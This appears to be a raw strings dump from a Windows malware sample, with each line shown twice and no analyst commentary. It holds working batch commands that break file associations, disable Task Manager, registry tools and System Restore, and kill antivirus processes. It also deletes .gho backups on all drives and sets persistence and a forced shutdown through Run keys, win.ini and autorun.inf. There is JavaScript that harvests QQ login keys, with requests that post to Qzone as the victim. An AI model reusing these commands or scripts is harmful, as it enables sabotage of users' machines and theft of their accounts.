SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .exe=nullfile
assoc .reg=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .txt=nullfile
assoc .com=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
goto 22c:\slears.bat
.slear
.slear
d:\sleartest.exe
d:\sleartest.exe
adm-music.com
adm-music.com
O%u,%
O%u,%
J÷%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
c:\windows\system32\
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
VERSION.dll
VERSION.dll
WSOCK32.dll
WSOCK32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
VVV.dywt.com.cn
VVV.dywt.com.cn
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
GetCPInfo
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
GetViewportExtEx
GetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
GetKeyboardLayout
GetKeyboardLayout
VkKeyScanExA
VkKeyScanExA
keybd_event
keybd_event
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
%FN~/v
%FN~/v
r1.Xj9S/-W
r1.Xj9S/-W
%CGK
%CGK
PAD
PAD
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
(*.*)
(*.*)
1.6.0.0
1.6.0.0
(hXXp://VVV.eyuyan.com)
(hXXp://VVV.eyuyan.com)
%original file name%.exe_1756_rwx_00401000_000E4000:
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
atl.dll
atl.dll
wininet.dll
wininet.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
NTDLL.DLL
NTDLL.DLL
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
sleartest.exe
sleartest.exe
dll.bat
dll.bat
\*.dll
\*.dll
exe.bat
exe.bat
\*.exe
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
http=
https
https
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
hXXp://
hXXp://
len = str.length; i
len = str.length; i
var t = QZONE.FormSender;
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
var a = QZFL.string.trim(fm.action);
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
fm.action = a
fm.action = a
slear && del / f / s / q c:\slear.bat
slear && del / f / s / q c:\slear.bat
c:\slear.bat
c:\slear.bat
cmd.exe
cmd.exe
c:\windows\system\shutdown.bat
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat r s h
attrib %windir%\system32\cmd.bat r s h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
start d:\setup.bat /min >nul
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat r s h%
attrib %windir%/system32/explorer.bat r s h%
attrib %systemroot%/windows.bat r s h
attrib %systemroot%/windows.bat r s h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
